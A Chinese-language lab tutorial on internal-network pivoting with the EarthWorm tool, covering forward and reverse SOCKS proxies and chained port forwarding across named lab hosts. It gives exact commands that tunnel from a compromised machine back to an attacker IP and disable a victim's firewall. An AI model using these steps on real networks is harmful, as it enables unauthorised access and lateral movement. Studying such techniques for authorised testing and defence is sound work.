内网渗透不光只是反弹一个shell,反弹一个端口,我们更需要对内网进行更深一步的扫描和渗透,这时候就需要设置找到一个代理服务器,充当外网和内网数据转发的节点。所以出现了反弹代理,也叫反弹socket
实验一:利用Earthworm实现内网代理转发
实验1:正向代理
实验环境 :win2008 网卡一:10.1.1.1
网卡二:192.168.140.131
win2003:10.1.1.2
实验步骤:
1.将ew工具的ew_for_Win.exe程序上传到win2008服务器
2.进入ew工具的所在位置,设置代理:ew.exe -s ssocksd -l 800
3.访问受害者win2003的网页,即可访问到
4.外网想要访问受害者网页,也可通过bp添加代理,
5.之后选择刚添加的代理,直接访问内网的ip即可访问到网页的内容
6.如果想要访问远程桌面,则可利用工具proxifier添加代理服务器,即可连接
7.如果在linux上设置代理,则可在浏览器设置代理,如下图,设置完成后即可访问目标主机的网页
8.kali中也可用proxychains工具,修改其配置文件,gedit /etc/proxychains.conf,在里边添加代理
9.之后输入:proxychains rdesktop 10.1.1.2就可通过代理进行远程连接
实验二:ew高级用法反向代理
实验环境 :主机A:物理机
主机B:win2008
实验步骤:
1.先在一台具有公网ip的主机A上运行以下命令:
ew.exe -s rcsocks -l 1080 -e 8888
2.在目标主机B上启动SOCKS v5 服务 并反弹到公网主机的8888端口
ew.exe -s rssocks -d 攻击者ip -e 8888
3.在主机A上添加代理服务器,127.0.0.1:1080,即可进行远程连接
实验三:ew工具进阶—正向反弹代理
实验环境:攻击机 A:物理机
win8B:网卡一:192.168.140.131
网卡二:10.1.1.1
win3C: 网卡一:10.1.1.2
网卡二:172.16.1.1
linuxD:172.16.1.2
实验步骤:
1.关闭受害者D的防火墙:service iptables stop
2.在内网边界机C上设置端口代理:ew.exe -s ssocksd -l 8000
3.在win8上做端口转发:
ew -s lcx_tran -l 1080 -f win3受害者ip -g 8000
4.利用proxifier添加代理服务器,ip为win8B的ip,1080端口
5.之后便可进行远程访问
实验四:ew工具进阶—反向反弹代理
实验环境:攻击机A:物理机
win8B:网卡一:192.168.140.131
网卡二:10.1.1.1
win3C: 网卡一:10.1.1.2
网卡二:172.16.1.1
linuxD:172.16.1.2
实验步骤:
1.攻击机A开启监听端口:ew.exe -s lcx_listen -l 1080 -e 8888
2.内网边界机win3C将9999端口进行转发:ew.exe -s ssocksd -l 9999
3.内网边界机win8B将内网边界机win3C与攻击机连接起来:
ew -s lcx_slave -d 攻击机ip -e 8888 -f 内网边界机win3C的ip -g 9999
4.攻击机借助proxifier工具配置攻击机机器的代理:127.0.0.1:1080
5.之后便可进行远程访问